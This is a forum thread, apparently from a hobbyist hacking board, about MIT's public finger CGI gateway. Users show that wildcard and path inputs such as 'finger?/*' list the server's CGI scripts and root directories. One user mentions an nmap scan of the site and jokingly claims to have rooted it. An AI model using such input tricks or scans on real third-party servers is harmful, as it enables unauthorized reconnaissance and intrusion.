just a neat find

[trevelyn]

i am a fan of physics and like MIT, and i found on they're site a script that searches for people on their apache server i think??? if anyone knows tell me what this is? thanks guys - trev.

http://mit.edu/bin/finger

It's not my machine that is queried through the browser i tried "root" wasn't logged into my machine and said he/she was idle.  neato.

[gangals]

Look what it results when you enter the wildcard "*":

Code: [Select]

finger: cgicso: no such user.
finger: cgiecho: no such user.
finger: cgiemail: no such user.
finger: comment: no such user.
finger: finger: no such user.
finger: htimage: no such user.
finger: htsearch: no such user.
finger: printenv: no such user.
finger: search-route: no such user.
finger: search-route-new: no such user.
finger: search-route-new.save: no such user.
finger: search-route.save: no such user.
finger: test-cgi: no such user.

[trevelyn]

yeah, i found root, uucp, adm, sshd, apache...etc/ it's very neat I wanna host a finger applet like that from *my* apache server so people can see who's logged onto my machines.   I tried a google-mail search googrape search (user names) and inputted everything i found for that domain i guess no one was just logged on last night at 2 am, huh....

[I-baLL]

finger is a standard unix command.

[rbcp]

http://linux.about.com/library/cmd/blcmdl1_finger.htm

That's a site that explains what fingering is.  Before it was a sex term, it was a unix command.  Before we had ICQ, Yahoo IM, and AIM, we had finger.

[trevelyn]

a unix command?? whats that?!!  -  "yeah, i found root, uucp, adm, sshd, apache...etc/" was what i said before i just thought it was cool you can use the applet to see whos logged intyo the machine serving the MIT website that's all. 

[Godot]

Look what it results when you enter the wildcard "*":

Code: [Select]

finger: cgicso: no such user.
finger: cgiecho: no such user.
finger: cgiemail: no such user.
finger: comment: no such user.
finger: finger: no such user.
finger: htimage: no such user.
finger: htsearch: no such user.
finger: printenv: no such user.
finger: search-route: no such user.
finger: search-route-new: no such user.
finger: search-route-new.save: no such user.
finger: search-route.save: no such user.
finger: test-cgi: no such user.

You just listed the directory contents. Nice.

Go to http://mit.edu/bin/finger?* where * is any of those "no such user"s to run whatever the script is.

Some of these look fun. I just tried cgisco. Quite interesting.

[Godot]

More finds.

http://mit.edu/bin/finger?/*

Code: [Select]

finger: /afs: no such user.
finger: /alt: no such user.
finger: /bin: no such user.
finger: /boot: no such user.
finger: /cache: no such user.
finger: /dev: no such user.
finger: /etc: no such user.
finger: /home: no such user.
finger: /hs_err_pid6136.log: no such user.
finger: /hs_err_pid6145.log: no such user.
finger: /hs_err_pid6169.log: no such user.
finger: /hs_err_pid6176.log: no such user.
finger: /initrd: no such user.
finger: /lib: no such user.
finger: /lost+found: no such user.
finger: /misc: no such user.
finger: /mit: no such user.
finger: /mnt: no such user.
finger: /opt: no such user.
finger: /proc: no such user.
finger: /root: no such user.
finger: /sbin: no such user.
finger: /service: no such user.
finger: /tmp: no such user.
finger: /usr: no such user.
finger: /var: no such user.
You have to edit the URL to get it to not convert the '/'. You can use other stuff like /etc/* or /usr/* to list any directory on the system.

Have fun with it.

[trevelyn]

  goddamn i hate this old sparc station !!! i NEED NEW HARDWARE!!! okay sorry blowing off steam anyways yeah, thats an awesome find.  i gathered tons of info on the site just for kicks, and well, i used to browse peoples papers that weren;t linked on their personal pages (pdf's) about cool AI problems mathematics and cyphers, and my all time favourite - quantum mechanics, and the only way to get the "hidden" pdf's was to simply index the site.. so i wondered why are they letting me index it?? then i realised mit.edu/manual/ was up!! so i just started randomly choosing things then nmaped the server and saw ports used... then i found this. -  I checked the source so i can use the same http applet for finger so i can check on my network at home remotely but there is none???      

[trevelyn]

  whoops damn solaris dilema - heres the file:

http://zombie.el.cx/tmp/mit-edu.txt  just easy info that may prove useful in playing with this site.

[trevelyn]

i did it, i got it. i got in. i even RECORDED IT!   The wink flash recorder and player is cool and all, but when i recorded it, it kept skipping my prompt down a line, i guess the translatory process of shitty code c's?

anyways, speaking of stories, you ever hear the story of the words biggest encryption, code and math expert school? they get hacked. oh, and believe me, i got my story straight.

http://zombie.el.cx/videos/hack/mit-hack.htm

 

[mr_doc]

finger is a daemon. You probably have it installed; just turn it on.

[trevelyn]

i know exactly what finger and the "daemon" fingerd are.  i was simply joking that i rooted one of mits servers, with a quick shell script i made, and a video.  thats why i posted the video. as a joke.  Early April fools! i guess.  didn't mean to throw you off there.